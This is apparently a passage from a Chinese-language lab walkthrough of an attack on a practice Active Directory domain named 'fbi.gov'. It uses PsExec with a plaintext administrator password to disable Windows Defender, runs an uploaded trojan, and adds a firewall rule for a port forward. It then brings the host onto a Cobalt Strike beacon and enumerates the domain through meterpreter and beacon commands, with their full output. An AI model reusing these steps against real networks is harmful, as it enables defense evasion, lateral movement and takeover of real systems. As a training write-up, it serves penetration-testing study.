PSEXESVC.exe 3976 PSEXESVC
128to129.exe 4480 N/A
conhost.exe 3196 N/A
notepad.exe 2220 N/A
notepad.exe 4364 N/A
notepad.exe 2104 N/A
cmd.exe 4572 N/A
conhost.exe 68 N/A
tasklist.exe 3652 N/A
杀软信息
msmpeng.exe:windows defender
mpcmdrun.exe:windows defender
关闭Windows Defeder
上传
关闭
PsExec.exe \\10.10.1.128 -u administrator -p QWEasd123 -i c:/DefenderSwitch.exe -off
结果
检查
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 316 N/A
csrss.exe 384 N/A
wininit.exe 480 N/A
csrss.exe 488 N/A
winlogon.exe 556 N/A
services.exe 604 N/A
lsass.exe 612 KeyIso, Netlogon, SamSs, VaultSvc
svchost.exe 700 BrokerInfrastructure, DcomLaunch, LSM,
PlugPlay, Power, SystemEventsBroker
svchost.exe 760 RpcEptMapper, RpcSs
dwm.exe 844 N/A
svchost.exe 908 NcbService, Netman, PcaSvc, StorSvc,
TrkWks, UALSVC, wudfsvc
svchost.exe 916 Dhcp, EventLog, lmhosts, TimeBrokerSvc
svchost.exe 924 CDPSvc, EventSystem, FontCache,
LicenseManager, netprofm, nsi, W32Time,
WinHttpAutoProxySvc
svchost.exe 1012 BFE, CoreMessagingRegistrar, DPS, MpsSvc
svchost.exe 1020 CryptSvc, Dnscache, LanmanWorkstation,
NlaSvc, WinRM
svchost.exe 1104 Appinfo, DsmSvc, gpsvc, iphlpsvc, lfsvc,
ProfSvc, Schedule, SENS, ShellHWDetection,
Themes, UserManager, Winmgmt, WpnService
svchost.exe 1204 Wcmsvc
spoolsv.exe 1628 Spooler
svchost.exe 1672 DiagTrack
vmtoolsd.exe 1712 VMTools
svchost.exe 1772 StateRepository, tiledatamodelsvc
svchost.exe 1784 LanmanServer
VGAuthService.exe 1792 VGAuthService
dllhost.exe 2244 COMSysApp
msdtc.exe 2364 MSDTC
WmiPrvSE.exe 2956 N/A
RuntimeBroker.exe 3980 N/A
sihost.exe 1624 N/A
svchost.exe 1660 CDPUserSvc_6b7cd, OneSyncSvc_6b7cd
taskhostw.exe 2464 N/A
ChsIME.exe 396 N/A
explorer.exe 3872 N/A
ShellExperienceHost.exe 3344 N/A
SearchUI.exe 1392 N/A
vm3dservice.exe 3512 N/A
vmtoolsd.exe 3656 N/A
ApplicationFrameHost.exe 2176 N/A
LogonUI.exe 624 N/A
ChsIME.exe 5056 N/A
LockAppHost.exe 4932 N/A
LockApp.exe 1348 N/A
csrss.exe 2432 N/A
winlogon.exe 1812 N/A
dwm.exe 1960 N/A
ChsIME.exe 1228 N/A
RuntimeBroker.exe 4872 N/A
sihost.exe 3372 N/A
svchost.exe 1652 CDPUserSvc_5f77fd, OneSyncSvc_5f77fd
taskhostw.exe 4412 N/A
explorer.exe 3100 N/A
ChsIME.exe 576 N/A
ShellExperienceHost.exe 5000 N/A
ServerManager.exe 3844 N/A
SearchUI.exe 5052 N/A
vm3dservice.exe 308 N/A
cmd.exe 380 N/A
conhost.exe 2584 N/A
PSEXESVC.exe 3976 PSEXESVC
128to129.exe 4480 N/A
conhost.exe 3196 N/A
cmd.exe 4572 N/A
conhost.exe 68 N/A
TrustedInstaller.exe 2192 TrustedInstaller
tasklist.exe 180 N/A
杀软
无
上线CS
设置代理
参考
https://mp.weixin.qq.com/s/HwWR3-2IWFEp-tmSnNWDrA
生成木马
上传
复制到10.10.1.128的机器上
执行
PsExec.exe \\10.10.1.128 -u administrator -p QWEasd123 -i c:/128to129tocs.exe
结果
失败、转发不成功
tomcat-web Beacon 添加转发规则
shell netsh advfirewall firewall add rule name="6160" protocol=TCP dir=in localport=6160 action=allow
结果
再次尝试
失败
还是不行!!!!
使用CS的psexec进行上线
上面我们使用CS的psexec进行上线10.10.1.128的域内主机的时候、我们使用的是反向连接的方式进行的、但是我们在后面的扫描中发现10.10.1.128机器是只开放445端口的、我们是只能利用正向连接的方式进行建立会话的、再次尝试
使用正向连接
成功上线cs
dc域内信息搜集
使用msf
meterpreter > ipconfig /all
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 2
============
Name : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:a0a:a8c
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 4
============
Name : Intel(R) 82574L Gigabit Network Connection #2
Hardware MAC : 00:0c:29:76:60:d0
MTU : 1500
IPv4 Address : 10.10.10.140 #域内网卡
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::c5d:2340:1275:9b44
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 7
============
Name : Intel(R) 82574L Gigabit Network Connection
Hardware MAC : 00:0c:29:76:60:c6
MTU : 1500
IPv4 Address : 10.10.1.128 #本机网卡
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::d142:345b:c480:4c70
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 23
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:a0a:180
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
使用shell
C:\Windows\system32>systeminfo
systeminfo
Host Name: FILESERVER #主机名
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows 用户
Registered Organization:
Product ID: 00377-60000-00000-AA912
Original Install Date: 2020/11/4, 20:46:55
System Boot Time: 2022/2/8, 23:02:17
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 166 Stepping 0 GenuineIntel ~1608 Mhz
[02]: Intel64 Family 6 Model 166 Stepping 0 GenuineIntel ~1608 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16722896.B64.2008100651, 2020/8/10
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: zh-cn;Chinese (China)
Input Locale: zh-cn;Chinese (China)
Time Zone: (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Total Physical Memory: 2,047 MB
Available Physical Memory: 834 MB
Virtual Memory: Max Size: 2,815 MB
Virtual Memory: Available: 1,559 MB
Virtual Memory: In Use: 1,256 MB
Page File Location(s): C:\pagefile.sys
Domain: fbi.gov #发现域控名称:fbi.gov
Logon Server: N/A
Hotfix(s): 2 Hotfix(s) Installed.
[01]: KB3199986
[02]: KB3200970
Network Card(s): 2 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.1.128
[02]: fe80::d142:345b:c480:4c70
[02]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet1
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.140
[02]: fe80::c5d:2340:1275:9b44
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
C:\Windows\system32>arp -a
arp -a
Interface: 10.10.10.140 --- 0x4
Internet Address Physical Address Type
10.10.10.1 00-50-56-c0-00-13 dynamic
10.10.10.139 00-0c-29-37-c2-ee dynamic #域主机出现
10.10.10.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
Interface: 10.10.1.128 --- 0x7
Internet Address Physical Address Type
10.10.1.129 00-0c-29-49-bb-5d dynamic #tomcat-web
10.10.1.254 00-50-56-e8-81-6b dynamic
10.10.1.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
C:\>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : fileserver
Primary Dns Suffix . . . . . . . : fbi.gov
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : fbi.gov
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
Physical Address. . . . . . . . . : 00-0C-29-76-60-C6
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::d142:345b:c480:4c70%8(Preferred)
IPv4 Address. . . . . . . . . . . : 10.10.1.128(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.1.254
DHCPv6 IAID . . . . . . . . . . . : 50334761
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-8D-04-45-00-0C-29-76-60-C6
DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
fec0:0:0:ffff::2%1
fec0:0:0:ffff::3%1
NetBIOS over Tcpip. . . . . . . . : Enabled
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2
Physical Address. . . . . . . . . : 00-0C-29-76-60-D0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::c5d:2340:1275:9b44%5(Preferred)
IPv4 Address. . . . . . . . . . . : 10.10.10.140(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.1
DHCPv6 IAID . . . . . . . . . . . : 150998057
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-8D-04-45-00-0C-29-76-60-C6
DNS Servers . . . . . . . . . . . : 10.10.10.139
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.{8438E7C5-35B5-4521-9CCA-52E6E2A1F1F7}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter isatap.localdomain:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
使用cs
beacon> net computers #域内主机信息(名称、域内ip)
[*] Tasked beacon to run net computers
[+] host called home, sent: 105062 bytes
[+] received output:
Computers:
Server Name IP Address
----------- ----------
DC 10.10.10.139 #dc域主机出现10.10.10.139
FILESERVER 10.10.1.128
beacon> net dclist #域内主机列表
[*] Tasked beacon to run net dclist
[+] host called home, sent: 105059 bytes
[+] received output:
DCs:
[+] received output:
Server Name IP Address Platform Version Type Comment
----------- ---------- -------- ------- ---- -------
[-] Error: 6118
beacon> net domain #域名称
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
fbi.gov
beacon> net domain_controllers #域主机信息
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 105071 bytes
[+] received output:
Domain Controllers:
Server Name IP Address
----------- ----------
DC 10.10.10.139 #dc主机信息
beacon> net domain_trusts #域主机状态
[*] Tasked beacon to run net domain_trusts
[+] host called home, sent: 105066 bytes
[+] received output:
List of domain trusts:
0: FBI fbi.gov (Forest tree root) (Primary Domain) (Native)
beacon> net group #域内分组
[*] Tasked beacon to run net group on localhost
[+] host called home, sent: 105058 bytes
[+] received output:
Groups:
Name Comment
---- -------
beacon> net localgroup #当前机器在域内所属组
[*] Tasked beacon to run net localgroup on localhost
[+] host called home, sent: 105063 bytes
[+] received output:
Local groups for \\localhost:
Name Comment
---- -------
beacon> net logons #域内登录用户
[*] Tasked beacon to run net logons on localhost
[+] host called home, sent: 105059 bytes
[+] received output:
Logged on users at \\localhost:
FILESERVER\Administrator
FBI\FILESERVER$
FBI\FILESERVER$
FBI\FILESERVER$
beacon> net sessions #域内连接会话
[*] Tasked beacon to run net sessions on localhost
[+] host called home, sent: 105061 bytes
[+] received output:
Sessions for \\localhost:
Computer User name Active (s) Idle (s)
-------- --------- ---------- --------
\\[fe80::1479:3673:41d4:fdd7] Administrator 760 1
\\[::1] FILESERVER$ 5 0
beacon> net share #域控开启的share方式
[*] Tasked beacon to run net share on localhost
[+] host called home, sent: 105058 bytes
[+] received output:
Shares at \\localhost:
Share name Comment
---------- -------
ADMIN$ 远程管理
C$ 默认共享
IPC$ 远程 IPC
beacon> net time #域主机时间
[*] Tasked beacon to run net time on localhost
[+] host called home, sent: 105057 bytes
[+] received output:
Current time at \\localhost is 2/10/2022 00:06:33
beacon> net user #域主机用户
[*] Tasked beacon to run net user on localhost
[+] host called home, sent: 105057 bytes
[+] received output:
Users for \\localhost:
Administrator (admin)
DefaultAccount
Guest
beacon> net view
[*] Tasked beacon to run net view
[+] host called home, sent: 105057 bytes
[+] received output:
List of hosts:
[+] received output:
Server Name IP Address Platform Version Type Comment
----------- ---------- -------- ------- ---- -------
[-] Error: 6118